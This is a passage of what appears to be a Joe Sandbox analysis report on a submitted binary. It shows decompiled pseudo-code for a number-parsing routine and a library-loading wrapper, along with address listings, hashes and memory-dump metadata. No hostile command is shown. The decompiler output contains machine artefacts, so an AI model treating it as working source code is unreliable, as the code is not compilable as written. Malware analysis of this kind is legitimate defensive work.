				_v72 = 0x1810;
				_v68 = 0xff1a;
				if ((r14d & 0xffffffef) != 0) goto 0x35c4fe70;
				if (_t197 - 0x30 < 0) goto 0x35c4fdbf;
				if (_t197 - 0x3a >= 0) goto 0x35c4fc0e;
				goto 0x35c4fdba;
				if (_t197 - 0xff10 >= 0) goto 0x35c4fdab;
				if (_t197 - r8w < 0) goto 0x35c4fdbf;
				if (_t197 - 0x66a >= 0) goto 0x35c4fc36;
				goto 0x35c4fdba;
				if (_t197 - r10w < 0) goto 0x35c4fdbf;
				if (_t197 - 0x6fa >= 0) goto 0x35c4fc55;
				goto 0x35c4fdba;
				if (_t197 - r11w < 0) goto 0x35c4fdbf;
				if (_t197 - 0x970 >= 0) goto 0x35c4fc74;
				goto 0x35c4fdba;
				if (_t197 - r9w < 0) goto 0x35c4fdbf;
				if (_t197 - 0x9f0 >= 0) goto 0x35c4fc93;
				goto 0x35c4fdba;
				if (_t197 - (_t197 & 0x0000ffff) - r9d < 0) goto 0x35c4fdbf;
				if (_t197 - _a16 >= 0) goto 0x35c4fcb3;
				goto 0x35c4fdba;
				if (_t197 - _v152 < 0) goto 0x35c4fdbf;
				if (_t197 - _v148 < 0) goto 0x35c4fc04;
				if (_t197 - _v144 < 0) goto 0x35c4fdbf;
				if (_t197 - _v140 < 0) goto 0x35c4fc04;
				if (_t197 - _v136 < 0) goto 0x35c4fdbf;
				if (_t197 - _v132 < 0) goto 0x35c4fc04;
				if (_t197 - _v128 < 0) goto 0x35c4fdbf;
				if (_t197 - _v124 < 0) goto 0x35c4fc04;
				if (_t197 - _v120 < 0) goto 0x35c4fdbf;
				if (_t197 - _v116 < 0) goto 0x35c4fc04;
				if (_t197 - _v112 < 0) goto 0x35c4fdbf;
				if (_t197 - _v108 < 0) goto 0x35c4fc04;
				if (_t197 - _v104 < 0) goto 0x35c4fdbf;
				if (_t197 - _v100 < 0) goto 0x35c4fc04;
				if (_t197 - _v96 < 0) goto 0x35c4fdbf;
				if (_t197 - _v92 < 0) goto 0x35c4fc04;
				if (_t197 - _v88 < 0) goto 0x35c4fdbf;
				if (_t197 - _v84 < 0) goto 0x35c4fc04;
				if (_t197 - _v80 < 0) goto 0x35c4fdbf;
				if (_t197 - _v76 < 0) goto 0x35c4fc04;
				if ((_t197 & 0x0000ffff) - _v72 - 9 > 0) goto 0x35c4fdbf;
				goto 0x35c4fc04;
				if (_t197 - _v68 >= 0) goto 0x35c4fdbf;
				if ((_t197 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x35c4fde1;
				_t64 = _t380 - 0x41; // -17
				_t65 = _t380 - 0x61; // -49
				_t154 = _t65;
				if (_t64 - 0x19 <= 0) goto 0x35c4fdd6;
				if (_t154 - 0x19 > 0) goto 0x35c4fe61;
				if (_t154 - 0x19 > 0) goto 0x35c4fdde;
				_t66 = _t380 - 0x37; // -231
				if (_t66 != 0) goto 0x35c4fe61;
				_t381 =  *_t388;
				r9d = 0xffdf;
				_t246 =  *_t381 & 0x0000ffff;
				_t67 =  &(_t381[1]); // 0xffe1
				_t394 = _t67;
				 *_t388 = _t394;
				_t68 = _t385 - 0x58; // 0x698
				if ((r9w & _t68) == 0) goto 0x35c4fe49;
				 *_t388 = _t381;
				_t158 =  !=  ? r14d : 8;
				r14d =  !=  ? r14d : 8;
				if (_t246 == 0) goto 0x35c4fe41;
				if ( *_t381 == _t246) goto 0x35c4fe41;
				E00007FF77FF735C53B18(_t371);
				 *_t371 = 0x16;
				E00007FF77FF735C59400();
				r8d = 0x660;
				r10d = 0x6f0;
				r11d = 0x966;
				goto 0x35c4fe70;
				r8d = 0x660;
				goto 0x35c4fe70;
				_t198 =  *_t394 & 0x0000ffff;
				_t71 =  &(_t394[1]); // 0xffe3
				_t372 = _t71;
				 *_t388 = _t372;
				r8d = 0x660;
				goto 0x35c4fe66;
				_t163 =  !=  ? r14d : 0xa;
				r14d = 0xa;
				_t164 = ( !=  ? r14d : 0xa) | 0xffffffff;
				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				_t248 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r13d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t198 - r13w < 0) goto 0x35c50040;
				if (_t198 - 0x3a >= 0) goto 0x35c4fea2;
				goto 0x35c5003b;
				if (_t198 - r15w >= 0) goto 0x35c5002b;
				if (_t198 - r8w < 0) goto 0x35c50040;
				if (_t198 - 0x66a >= 0) goto 0x35c4fecb;
				goto 0x35c5003b;
				if (_t198 - r10w < 0) goto 0x35c50040;
				if (_t198 - 0x6fa >= 0) goto 0x35c4feea;
				goto 0x35c5003b;
				if (_t198 - r11w < 0) goto 0x35c50040;
				if (_t198 - 0x970 >= 0) goto 0x35c4ff09;
				goto 0x35c5003b;
				if (_t198 - 0x9e6 < 0) goto 0x35c50040;
				_t76 =  &(_t372[5]); // 0x9f0
				if (_t198 - _t76 >= 0) goto 0x35c4ff29;
				goto 0x35c5003b;
				if (_t198 - 0xa66 < 0) goto 0x35c50040;
				if (_t198 - _a16 < 0) goto 0x35c4ff1f;
				if (_t198 - _v152 < 0) goto 0x35c50040;
				if (_t198 - _v148 < 0) goto 0x35c4ff1f;
				if (_t198 - _v144 < 0) goto 0x35c50040;
				if (_t198 - _v140 < 0) goto 0x35c4ff1f;
				if (_t198 - _v136 < 0) goto 0x35c50040;
				if (_t198 - _v132 < 0) goto 0x35c4ff1f;
				if (_t198 - _v128 < 0) goto 0x35c50040;
				if (_t198 - _v124 < 0) goto 0x35c4ff1f;
				if (_t198 - _v120 < 0) goto 0x35c50040;
				if (_t198 - _v116 < 0) goto 0x35c4ff1f;
				if (_t198 - _v112 < 0) goto 0x35c50040;
				if (_t198 - _v108 < 0) goto 0x35c4ff1f;
				if (_t198 - _v104 < 0) goto 0x35c50040;
				if (_t198 - _v100 < 0) goto 0x35c4ff1f;
				if (_t198 - _v96 < 0) goto 0x35c50040;
				if (_t198 - _v92 < 0) goto 0x35c4ff1f;
				if (_t198 - _v88 < 0) goto 0x35c50040;
				if (_t198 - _v84 < 0) goto 0x35c4ff1f;
				if (_t198 - _v80 < 0) goto 0x35c50040;
				if (_t198 - _v76 < 0) goto 0x35c4ff1f;
				if ((_t198 & 0x0000ffff) - _v72 - 9 > 0) goto 0x35c50040;
				goto 0x35c5003b;
				if (_t198 - _v68 >= 0) goto 0x35c50040;
				if ((_t198 & 0x0000ffff) - r15d != 0xffffffff) goto 0x35c50063;
				_t100 = _t381 - 0x41; // -65
				_t101 = _t381 - 0x61; // -97
				_t184 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x35c50053;
				if (_t184 - 0x19 > 0) goto 0x35c50060;
				if (_t184 - 0x19 > 0) goto 0x35c5005b;
				goto 0x35c50063;
				_t395 =  *_t388;
				if (((_t198 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x35c500a7;
				_t199 =  *_t395 & 0x0000ffff;
				_t250 = _t372 + _t381;
				_t257 = _t250;
				_t107 =  &(_t395[1]); // 0x12
				r8d = 0x660;
				 *_t388 = _t107;
				_t254 = ( !=  ? _t134 : _t134 | 0x00000002) | (r12d & 0xffffff00 | _t250 - r12d * r14d > 0x00000000 | r12d & 0xffffff00 | _t256 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x35c4fe87;
				_t399 = _v64;
				_t109 = _t395 - 2; // 0xe
				_t374 = _t109;
				_t397 = _a8;
				 *_t388 = _t374;
				if (_t199 == 0) goto 0x35c500d8;
				if ( *_t374 == _t199) goto 0x35c500d8;
				E00007FF77FF735C53B18(_t374);
				 *_t374 = 0x16;
				E00007FF77FF735C59400();
				if ((dil & 0x00000008) != 0) goto 0x35c500f4;
				_t375 = _t388[1];
				 *_t388 = _t399;
				if (_t375 == 0) goto 0x35c500ed;
				 *_t375 = _t399;
				goto 0x35c50178;
				r8d = 0x80000000;
				_t114 = _t395 - 1; // 0xf
				r9d = _t114;
				if ((dil & 0x00000004) != 0) goto 0x35c5011c;
				if ((dil & 0x00000001) == 0) goto 0x35c5015f;
				if ((dil & 0x00000002) == 0) goto 0x35c50117;
				if (_t257 - r8d <= 0) goto 0x35c50165;
				goto 0x35c5011c;
				if (_t257 - r9d <= 0) goto 0x35c50167;
				 *((char*)(_t397 + 0x30)) = 1;
				 *((intOrPtr*)(_t397 + 0x2c)) = 0x22;
				if ((_t254 & 0x00000001) != 0) goto 0x35c50137;
				goto 0x35c50167;
				_t386 = _t388[1];
				if ((_t254 & 0x00000002) == 0) goto 0x35c5014f;
				if (_t386 == 0) goto 0x35c5014a;
				 *_t386 =  *_t388;
				goto 0x35c50178;
				if (_t386 == 0) goto 0x35c5015a;
				 *_t386 =  *_t388;
				goto 0x35c50178;
				if ((dil & 0x00000002) == 0) goto 0x35c50167;
				_t387 = _t388[1];
				if (_t387 == 0) goto 0x35c50176;
				 *_t387 =  *_t388;
				return  ~(_t257 | 0xffffffff);
			}




























































                                                                                                                                                                                                                              0x7ff735c4fa3c
                                                                                                                                                                                                                              0x7ff735c4fa3c
                                                                                                                                                                                                                              0x7ff735c4fa3c
                                                                                                                                                                                                                              0x7ff735c4fa3c
                                                                                                                                                                                                                              0x7ff735c4fa41
                                                                                                                                                                                                                              0x7ff735c4fa58
                                                                                                                                                                                                                              0x7ff735c4fa5b
                                                                                                                                                                                                                              0x7ff735c4fa5e
                                                                                                                                                                                                                              0x7ff735c4fa66
                                                                                                                                                                                                                              0x7ff735c4fa69
                                                                                                                                                                                                                              0x7ff735c4fa6f
                                                                                                                                                                                                                              0x7ff735c4fa71
                                                                                                                                                                                                                              0x7ff735c4fa76
                                                                                                                                                                                                                              0x7ff735c4fa7c
                                                                                                                                                                                                                              0x7ff735c4fa81
                                                                                                                                                                                                                              0x7ff735c4fa86
                                                                                                                                                                                                                              0x7ff735c4fa88
                                                                                                                                                                                                                              0x7ff735c4fa8f
                                                                                                                                                                                                                              0x7ff735c4fa91
                                                                                                                                                                                                                              0x7ff735c4fa96
                                                                                                                                                                                                                              0x7ff735c4fa99
                                                                                                                                                                                                                              0x7ff735c4fa9d
                                                                                                                                                                                                                              0x7ff735c4faa0
                                                                                                                                                                                                                              0x7ff735c4faab
                                                                                                                                                                                                                              0x7ff735c4fab0
                                                                                                                                                                                                                              0x7ff735c4fab5
                                                                                                                                                                                                                              0x7ff735c4fabc
                                                                                                                                                                                                                              0x7ff735c4fac5
                                                                                                                                                                                                                              0x7ff735c4fac8
                                                                                                                                                                                                                              0x7ff735c4fad1
                                                                                                                                                                                                                              0x7ff735c4fad5
                                                                                                                                                                                                                              0x7ff735c4fad9
                                                                                                                                                                                                                              0x7ff735c4fade
                                                                                                                                                                                                                              0x7ff735c4faed
                                                                                                                                                                                                                              0x7ff735c4faf6
                                                                                                                                                                                                                              0x7ff735c4faf8
                                                                                                                                                                                                                              0x7ff735c4fafb
                                                                                                                                                                                                                              0x7ff735c4faff
                                                                                                                                                                                                                              0x7ff735c4fb02
                                                                                                                                                                                                                              0x7ff735c4fb12
                                                                                                                                                                                                                              0x7ff735c4fb1f
                                                                                                                                                                                                                              0x7ff735c4fb2c
                                                                                                                                                                                                                              0x7ff735c4fb34
                                                                                                                                                                                                                              0x7ff735c4fb3a
                                                                                                                                                                                                                              0x7ff735c4fb42
                                                                                                                                                                                                                              0x7ff735c4fb42
                                                                                                                                                                                                                              0x7ff735c4fb46
                                                                                                                                                                                                                              0x7ff735c4fb4e
                                                                                                                                                                                                                              0x7ff735c4fb54
                                                                                                                                                                                                                              0x7ff735c4fb5c
                                                                                                                                                                                                                              0x7ff735c4fb62
                                                                                                                                                                                                                              0x7ff735c4fb6a
                                                                                                                                                                                                                              0x7ff735c4fb72
                                                                                                                                                                                                                              0x7ff735c4fb7a
                                                                                                                                                                                                                              0x7ff735c4fb82
                                                                                                                                                                                                                              0x7ff735c4fb8a
                                                                                                                                                                                                                              0x7ff735c4fb92
                                                                                                                                                                                                                              0x7ff735c4fb9a
                                                                                                                                                                                                                              0x7ff735c4fba2
                                                                                                                                                                                                                              0x7ff735c4fbaa
                                                                                                                                                                                                                              0x7ff735c4fbb2
                                                                                                                                                                                                                              0x7ff735c4fbba
                                                                                                                                                                                                                              0x7ff735c4fbc2
                                                                                                                                                                                                                              0x7ff735c4fbca
                                                                                                                                                                                                                              0x7ff735c4fbd2
                                                                                                                                                                                                                              0x7ff735c4fbdd
                                                                                                                                                                                                                              0x7ff735c4fbef
                                                                                                                                                                                                                              0x7ff735c4fbf8
                                                                                                                                                                                                                              0x7ff735c4fc02
                                                                                                                                                                                                                              0x7ff735c4fc09
                                                                                                                                                                                                                              0x7ff735c4fc11
                                                                                                                                                                                                                              0x7ff735c4fc1b
                                                                                                                                                                                                                              0x7ff735c4fc29
                                                                                                                                                                                                                              0x7ff735c4fc31
                                                                                                                                                                                                                              0x7ff735c4fc3a
                                                                                                                                                                                                                              0x7ff735c4fc48
                                                                                                                                                                                                                              0x7ff735c4fc50
                                                                                                                                                                                                                              0x7ff735c4fc59
                                                                                                                                                                                                                              0x7ff735c4fc67
                                                                                                                                                                                                                              0x7ff735c4fc6f
                                                                                                                                                                                                                              0x7ff735c4fc78
                                                                                                                                                                                                                              0x7ff735c4fc86
                                                                                                                                                                                                                              0x7ff735c4fc8e
                                                                                                                                                                                                                              0x7ff735c4fc96
                                                                                                                                                                                                                              0x7ff735c4fca4
                                                                                                                                                                                                                              0x7ff735c4fcae
                                                                                                                                                                                                                              0x7ff735c4fcba
                                                                                                                                                                                                                              0x7ff735c4fcc5
                                                                                                                                                                                                                              0x7ff735c4fcd2
                                                                                                                                                                                                                              0x7ff735c4fcdd
                                                                                                                                                                                                                              0x7ff735c4fcea
                                                                                                                                                                                                                              0x7ff735c4fcf5
                                                                                                                                                                                                                              0x7ff735c4fd02
                                                                                                                                                                                                                              0x7ff735c4fd0d
                                                                                                                                                                                                                              0x7ff735c4fd1a
                                                                                                                                                                                                                              0x7ff735c4fd25
                                                                                                                                                                                                                              0x7ff735c4fd32
                                                                                                                                                                                                                              0x7ff735c4fd3d
                                                                                                                                                                                                                              0x7ff735c4fd4a
                                                                                                                                                                                                                              0x7ff735c4fd51
                                                                                                                                                                                                                              0x7ff735c4fd5e
                                                                                                                                                                                                                              0x7ff735c4fd65
                                                                                                                                                                                                                              0x7ff735c4fd72
                                                                                                                                                                                                                              0x7ff735c4fd79
                                                                                                                                                                                                                              0x7ff735c4fd86
                                                                                                                                                                                                                              0x7ff735c4fd8d
                                                                                                                                                                                                                              0x7ff735c4fda4
                                                                                                                                                                                                                              0x7ff735c4fda6
                                                                                                                                                                                                                              0x7ff735c4fdb3
                                                                                                                                                                                                                              0x7ff735c4fdbd
                                                                                                                                                                                                                              0x7ff735c4fdc2
                                                                                                                                                                                                                              0x7ff735c4fdc8
                                                                                                                                                                                                                              0x7ff735c4fdc8
                                                                                                                                                                                                                              0x7ff735c4fdcb
                                                                                                                                                                                                                              0x7ff735c4fdd0
                                                                                                                                                                                                                              0x7ff735c4fdd9
                                                                                                                                                                                                                              0x7ff735c4fdde
                                                                                                                                                                                                                              0x7ff735c4fde3
                                                                                                                                                                                                                              0x7ff735c4fde5
                                                                                                                                                                                                                              0x7ff735c4fde8
                                                                                                                                                                                                                              0x7ff735c4fdee
                                                                                                                                                                                                                              0x7ff735c4fdf1
                                                                                                                                                                                                                              0x7ff735c4fdf1
                                                                                                                                                                                                                              0x7ff735c4fdf5
                                                                                                                                                                                                                              0x7ff735c4fdf8
                                                                                                                                                                                                                              0x7ff735c4fdff
                                                                                                                                                                                                                              0x7ff735c4fe04
                                                                                                                                                                                                                              0x7ff735c4fe0c
                                                                                                                                                                                                                              0x7ff735c4fe10
                                                                                                                                                                                                                              0x7ff735c4fe16
                                                                                                                                                                                                                              0x7ff735c4fe1b
                                                                                                                                                                                                                              0x7ff735c4fe1d
                                                                                                                                                                                                                              0x7ff735c4fe22
                                                                                                                                                                                                                              0x7ff735c4fe28
                                                                                                                                                                                                                              0x7ff735c4fe2d
                                                                                                                                                                                                                              0x7ff735c4fe33
                                                                                                                                                                                                                              0x7ff735c4fe39
                                                                                                                                                                                                                              0x7ff735c4fe3f
                                                                                                                                                                                                                              0x7ff735c4fe41
                                                                                                                                                                                                                              0x7ff735c4fe47
                                                                                                                                                                                                                              0x7ff735c4fe49
                                                                                                                                                                                                                              0x7ff735c4fe4d
                                                                                                                                                                                                                              0x7ff735c4fe4d
                                                                                                                                                                                                                              0x7ff735c4fe51
                                                                                                                                                                                                                              0x7ff735c4fe54
                                                                                                                                                                                                                              0x7ff735c4fe5f
                                                                                                                                                                                                                              0x7ff735c4fe69
                                                                                                                                                                                                                              0x7ff735c4fe6d
                                                                                                                                                                                                                              0x7ff735c4fe72
                                                                                                                                                                                                                              0x7ff735c4fe75
                                                                                                                                                                                                                              0x7ff735c4fe75
                                                                                                                                                                                                                              0x7ff735c4fe78
                                                                                                                                                                                                                              0x7ff735c4fe7e
                                                                                                                                                                                                                              0x7ff735c4fe84
                                                                                                                                                                                                                              0x7ff735c4fe8b
                                                                                                                                                                                                                              0x7ff735c4fe95
                                                                                                                                                                                                                              0x7ff735c4fe9d
                                                                                                                                                                                                                              0x7ff735c4fea6
                                                                                                                                                                                                                              0x7ff735c4feb0
                                                                                                                                                                                                                              0x7ff735c4febe
                                                                                                                                                                                                                              0x7ff735c4fec6
                                                                                                                                                                                                                              0x7ff735c4fecf
                                                                                                                                                                                                                              0x7ff735c4fedd
                                                                                                                                                                                                                              0x7ff735c4fee5
                                                                                                                                                                                                                              0x7ff735c4feee
                                                                                                                                                                                                                              0x7ff735c4fefc
                                                                                                                                                                                                                              0x7ff735c4ff04
                                                                                                                                                                                                                              0x7ff735c4ff11
                                                                                                                                                                                                                              0x7ff735c4ff17
                                                                                                                                                                                                                              0x7ff735c4ff1d
                                                                                                                                                                                                                              0x7ff735c4ff24
                                                                                                                                                                                                                              0x7ff735c4ff31
                                                                                                                                                                                                                              0x7ff735c4ff3f
                                                                                                                                                                                                                              0x7ff735c4ff48
                                                                                                                                                                                                                              0x7ff735c4ff53
                                                                                                                                                                                                                              0x7ff735c4ff5c
                                                                                                                                                                                                                              0x7ff735c4ff67
                                                                                                                                                                                                                              0x7ff735c4ff70
                                                                                                                                                                                                                              0x7ff735c4ff7b
                                                                                                                                                                                                                              0x7ff735c4ff84
                                                                                                                                                                                                                              0x7ff735c4ff8f
                                                                                                                                                                                                                              0x7ff735c4ff98
                                                                                                                                                                                                                              0x7ff735c4ffa3
                                                                                                                                                                                                                              0x7ff735c4ffb0
                                                                                                                                                                                                                              0x7ff735c4ffbb
                                                                                                                                                                                                                              0x7ff735c4ffc8
                                                                                                                                                                                                                              0x7ff735c4ffcf
                                                                                                                                                                                                                              0x7ff735c4ffdc
                                                                                                                                                                                                                              0x7ff735c4ffe3
                                                                                                                                                                                                                              0x7ff735c4fff0
                                                                                                                                                                                                                              0x7ff735c4fff7
                                                                                                                                                                                                                              0x7ff735c50004
                                                                                                                                                                                                                              0x7ff735c5000b
                                                                                                                                                                                                                              0x7ff735c50022
                                                                                                                                                                                                                              0x7ff735c50029
                                                                                                                                                                                                                              0x7ff735c50033
                                                                                                                                                                                                                              0x7ff735c5003e
                                                                                                                                                                                                                              0x7ff735c50043
                                                                                                                                                                                                                              0x7ff735c50049
                                                                                                                                                                                                                              0x7ff735c50049
                                                                                                                                                                                                                              0x7ff735c5004c
                                                                                                                                                                                                                              0x7ff735c50051
                                                                                                                                                                                                                              0x7ff735c50056
                                                                                                                                                                                                                              0x7ff735c5005e
                                                                                                                                                                                                                              0x7ff735c50063
                                                                                                                                                                                                                              0x7ff735c50069
                                                                                                                                                                                                                              0x7ff735c5006b
                                                                                                                                                                                                                              0x7ff735c50075
                                                                                                                                                                                                                              0x7ff735c50086
                                                                                                                                                                                                                              0x7ff735c5008d
                                                                                                                                                                                                                              0x7ff735c50094
                                                                                                                                                                                                                              0x7ff735c5009d
                                                                                                                                                                                                                              0x7ff735c500a0
                                                                                                                                                                                                                              0x7ff735c500a2
                                                                                                                                                                                                                              0x7ff735c500a7
                                                                                                                                                                                                                              0x7ff735c500af
                                                                                                                                                                                                                              0x7ff735c500af
                                                                                                                                                                                                                              0x7ff735c500b3
                                                                                                                                                                                                                              0x7ff735c500bb
                                                                                                                                                                                                                              0x7ff735c500c1
                                                                                                                                                                                                                              0x7ff735c500c6
                                                                                                                                                                                                                              0x7ff735c500c8
                                                                                                                                                                                                                              0x7ff735c500cd
                                                                                                                                                                                                                              0x7ff735c500d3
                                                                                                                                                                                                                              0x7ff735c500dc
                                                                                                                                                                                                                              0x7ff735c500de
                                                                                                                                                                                                                              0x7ff735c500e2
                                                                                                                                                                                                                              0x7ff735c500e8
                                                                                                                                                                                                                              0x7ff735c500ea
                                                                                                                                                                                                                              0x7ff735c500ef
                                                                                                                                                                                                                              0x7ff735c500f4
                                                                                                                                                                                                                              0x7ff735c500fa
                                                                                                                                                                                                                              0x7ff735c500fa
                                                                                                                                                                                                                              0x7ff735c50102
                                                                                                                                                                                                                              0x7ff735c50108
                                                                                                                                                                                                                              0x7ff735c5010e
                                                                                                                                                                                                                              0x7ff735c50113
                                                                                                                                                                                                                              0x7ff735c50115
                                                                                                                                                                                                                              0x7ff735c5011a
                                                                                                                                                                                                                              0x7ff735c5011e
                                                                                                                                                                                                                              0x7ff735c50126
                                                                                                                                                                                                                              0x7ff735c50130
                                                                                                                                                                                                                              0x7ff735c50135
                                                                                                                                                                                                                              0x7ff735c50137
                                                                                                                                                                                                                              0x7ff735c5013d
                                                                                                                                                                                                                              0x7ff735c50142
                                                                                                                                                                                                                              0x7ff735c50147
                                                                                                                                                                                                                              0x7ff735c5014d
                                                                                                                                                                                                                              0x7ff735c50152
                                                                                                                                                                                                                              0x7ff735c50157
                                                                                                                                                                                                                              0x7ff735c5015d
                                                                                                                                                                                                                              0x7ff735c50163
                                                                                                                                                                                                                              0x7ff735c50167
                                                                                                                                                                                                                              0x7ff735c5016e
                                                                                                                                                                                                                              0x7ff735c50173
                                                                                                                                                                                                                              0x7ff735c50192

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                              • Opcode ID: 76f7af4bffc44ae4ad3af7325dcd8ee04e2fc43108a28cc45bc475791125ad6b
                                                                                                                                                                                                                              • Instruction ID: 6862008319db4fa13a9da26eaa772646f61b5a5967ccb96c2813a2b22136c2cb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76f7af4bffc44ae4ad3af7325dcd8ee04e2fc43108a28cc45bc475791125ad6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9512B4A3E08153A6FB257E55E044ABAF792EB80F58FC44435E689567C4DE3CE480E721
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C47450 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 99COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                              • API String ID: 626452242-876015163
                                                                                                                                                                                                                              • Opcode ID: 736ff5c5a486b8fb642dc9890afd1a86a17a248b3734f15ea8e282deb651bce5
                                                                                                                                                                                                                              • Instruction ID: 2e820468198693dd5336cf1467510644aa2d725a4fd1a75b835fc3bb1c5adfa2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 736ff5c5a486b8fb642dc9890afd1a86a17a248b3734f15ea8e282deb651bce5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B41B073A08A9392EA11EF15A840579E7A2FB44F98F940235DE4D4BBA4DF3CD112E710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4C1F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                              			E00007FF77FF735C4C1F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x7ff735c40000 + 0x4a700 + _t81 * 8));
				if (_t61 == _t101) goto 0x35c4c31f;
				if (_t61 != 0) goto 0x35c4c321;
				if (__r8 == __r9) goto 0x35c4c317;
				_t67 =  *((intOrPtr*)(0x7ff735c40000 + 0x4a6e8 + __rsi * 8));
				if (_t67 == 0) goto 0x35c4c262;
				if (_t67 != _t101) goto 0x35c4c2f9;
				goto 0x35c4c2cd;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x35c4c2d9;
				if (GetLastError() != 0x57) goto 0x35c4c2bb;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00007FF77FF735C5904C(__r8) == 0) goto 0x35c4c2bb;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x35c4c2d9;
				 *((intOrPtr*)(0x7ff735c40000 + 0x4a6e8 + __rsi * 8)) = _t101;
				goto 0x35c4c240;
				_t21 = 0x7ff735c40000 + 0x4a6e8 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x35c4c2f9;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x35c4c317;
				 *((intOrPtr*)(0x7ff735c40000 + 0x4a700 + _t81 * 8)) = _t65;
				goto 0x35c4c321;
				 *((intOrPtr*)(0x7ff735c40000 + 0x4a700 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                                                                                                                                              0x7ff735c4c1f0
                                                                                                                                                                                                                              0x7ff735c4c1f5
                                                                                                                                                                                                                              0x7ff735c4c1fa
                                                                                                                                                                                                                              0x7ff735c4c215
                                                                                                                                                                                                                              0x7ff735c4c222
                                                                                                                                                                                                                              0x7ff735c4c22e
                                                                                                                                                                                                                              0x7ff735c4c237
                                                                                                                                                                                                                              0x7ff735c4c240
                                                                                                                                                                                                                              0x7ff735c4c249
                                                                                                                                                                                                                              0x7ff735c4c255
                                                                                                                                                                                                                              0x7ff735c4c25a
                                                                                                                                                                                                                              0x7ff735c4c260
                                                                                                                                                                                                                              0x7ff735c4c26f
